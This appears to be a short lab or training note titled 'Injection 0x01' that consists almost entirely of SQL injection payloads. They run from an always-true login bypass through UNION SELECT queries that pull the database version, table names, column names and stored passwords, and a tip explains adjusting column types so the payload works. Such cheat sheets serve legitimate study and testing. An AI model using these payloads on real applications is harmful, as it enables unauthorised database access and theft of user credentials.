Injection 0x01
jeremy' or 1=1-- -

jeremy' union select null,null,version()#

jeremy' union select null,null,table_name from information_schema.tables#

jeremy' union select null,null,column_name from information_schema.columns#

jeremy' union select null,null,password from injection0x01#

If you encounter like a ID column which is a int
Try to change the null which is a string to int
So that the payload will work
jeremy' union select null(int),1,null,null,password from injection0x01#
Last updated